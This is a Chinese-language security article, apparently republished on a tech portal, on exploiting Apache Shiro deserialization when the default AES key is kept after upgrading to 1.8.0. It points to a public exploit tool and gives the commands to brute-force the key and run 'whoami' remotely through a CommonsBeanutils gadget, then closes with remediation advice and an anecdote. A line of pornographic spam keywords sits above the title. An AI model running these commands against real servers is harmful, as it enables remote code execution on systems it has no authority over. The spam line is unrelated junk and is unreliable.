偷偷摘套内射激情视频,久久精品99国产国产精,中文字幕无线乱码人妻,中文在线中文a,性爽19p

Shiro 高版本默認密鑰的漏洞利用

安全 漏洞
在Shiro反序列化漏洞修復的過程中,如果僅進行Shiro的版本升級,而沒有重新生成密鑰,那么AES加密的默認密鑰扔硬編碼在代碼里,仍然會存在反序列化風險。

[[440903]]

在Shiro反序列化漏洞修復的過程中,如果僅進行Shiro的版本升級,而沒有重新生成密鑰,那么AES加密的默認密鑰扔硬編碼在代碼里,仍然會存在反序列化風險。

01、漏洞案例

本案例引用的shiro版本已是目前最新的1.8.0。嘗試訪問系統(tǒng)進行登錄,抓包獲取參數(shù)特征,包含xxx_rememberMe=deleteMe字段。

注意:在Shiro1.4.2版本后,Shiro的加密模式由AES-CBC更換為 AES-GCM,Shiro高版本下的漏洞利用,就需要考慮加密模式變化的情況。另外,這里cookie傳遞的參數(shù)是自定義的,而不是常見的rememberMe,這也是需要注意的地方。

02、漏洞利用

為了減少手工構造生成反序列化數(shù)據(jù)的繁瑣,這里,我們使用一個Shiro反序列化利用工具,python編寫,而且作者增加了AES-GCM加密方式的漏洞利用支持,可以很方便地進行修改和參數(shù)構建,

Github項目地址:

  1. https://github.com/Ares-X/shiro-exploit.git 

首先,我們需要修改python腳本參數(shù),將rememberMe 替換為 xxx_remeberme,使參數(shù)能夠正常傳遞。

利用腳本來爆破Shiro key:

  1. python shiro-exploit.py check -u http://10.xxx.xxx.72/shiro-cas.shtml 

成功獲取到了Shiro key。

發(fā)送回顯Payload,獲取命令執(zhí)行結果。

  1. python shiro-exploit.py echo -g CommonsBeanutils2  -v 2 -k 3AvVhmFLUs0KTA3Kprsdag== -c whoami -u http://10.xxx.xxx.72/shiro-cas.shtml 

修改python腳本設置代理,在requests使用代理proxies,增加proxies={'http': 'http://' + '127.0.0.1:8888'}。

這樣就可以將流量引入BurpSuite,抓取HTTP數(shù)據(jù)包,手動利用查看回顯。

以上便是Shiro高版本下默認密鑰的漏洞利用過程,So,修復Shiro默認密鑰漏洞,除了升級shiro至最新版本,一定要注意生成新的密鑰替換。

 

記錄個有意思的事情,之前有個內部系統(tǒng)確認過Shiro版本和密鑰都有更換,但后來還是被檢測到存在漏洞,一度有點懷疑人生。找開發(fā)一起排查了一下,原來有兩臺服務器負載,其中一臺是修復了,還有一臺舊服務器被遺忘了。我復測的時候是修復的狀態(tài),別人一掃描,漏洞還存在,直接淚崩。

 

責任編輯:武曉燕 來源: Bypass
相關推薦

2013-07-25 09:54:31

2013-07-30 10:01:10

2009-08-15 10:19:01

漏洞利用php expEXP程序

2016-01-12 10:44:00

2014-02-28 17:29:06

2021-11-10 11:51:33

BrakTooth安全漏洞藍牙設備

2023-08-06 00:05:02

2021-03-24 14:28:33

漏洞高通芯片安卓設備

2021-03-06 09:50:43

漏洞網(wǎng)絡安全網(wǎng)絡攻擊

2011-05-18 09:47:48

2021-07-29 15:48:04

漏洞網(wǎng)絡安全網(wǎng)絡攻擊

2022-04-01 10:04:27

]零日漏洞漏洞勒索軟件

2019-08-26 00:30:48

2023-11-17 11:29:28

2023-10-19 11:41:14

2023-08-17 12:36:46

2009-03-15 09:52:20

2023-07-26 17:13:38

2013-03-22 10:00:14

2023-05-06 11:05:50

點贊
收藏

51CTO技術棧公眾號